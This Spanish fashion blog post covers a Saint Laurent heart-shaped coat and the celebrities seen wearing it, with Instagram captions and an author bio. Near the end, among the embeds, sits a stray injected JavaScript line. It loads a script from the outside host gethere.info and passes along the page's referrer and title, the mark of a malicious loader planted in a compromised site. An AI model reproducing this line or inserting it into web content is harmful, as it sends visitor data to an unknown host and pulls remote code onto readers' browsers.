El abrigo de Saint Laurent que todo mundo quiere

Ni Kendall Jenner, ni Rihanna, ni Cara Delevingne, se han podido resistir a los encantos de este exuberante abrigo que se ha convertido en la pieza más hot del las celebridades y del street style.

Una de las mejores cosas que tiene la moda es que nada esta escrito y siempre estamos con los ojos abiertos para ver que de nuevo va surgir.

También con las redes sociales, los atuendos de las estrellas se viralizan creando nuevas tendencias de moda que todo mundo quiere tener.

Tal es el caso del abrigo de corazón de la firma Saint Laurent, que ha causado sensación entre los fashionistas.. La marca lo presentó durante su pasarela de invierno el año pasado y desde entonces, sea vuelto en un hit.

La primera en usarlo fue la modelo Cara Delevigne para la portada de la revista W. La que siguió los pasos de la modelo, fue Rhianna, quien salió por las calles de Nueva York portando el abrigo en forma de corazón con un estilo muy fresco.

I❤NY

A photo posted by badgalriri (@badgalriri) on

Pero quien realmente ha provocado furor con esta prenda ha sido Kendall Jenner, una de las mejores portadoras del street style, que hace unos meses compartió una imagen en Instagram con el abrigo con un look muy casual.

low key look

A photo posted by Kendall (@kendalljenner) on

El que también se unió recientemente a esta moda fue el reggaetonero, J Balvin, que también hizo de las suyas con el corazón. El atuendo no fue bien recibido entre sus más de 14 millones de seguidores.

No puedo jejejeje jejejejej / I can't hehehehehehe

A photo posted by J Balvin (@jbalvin) on

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado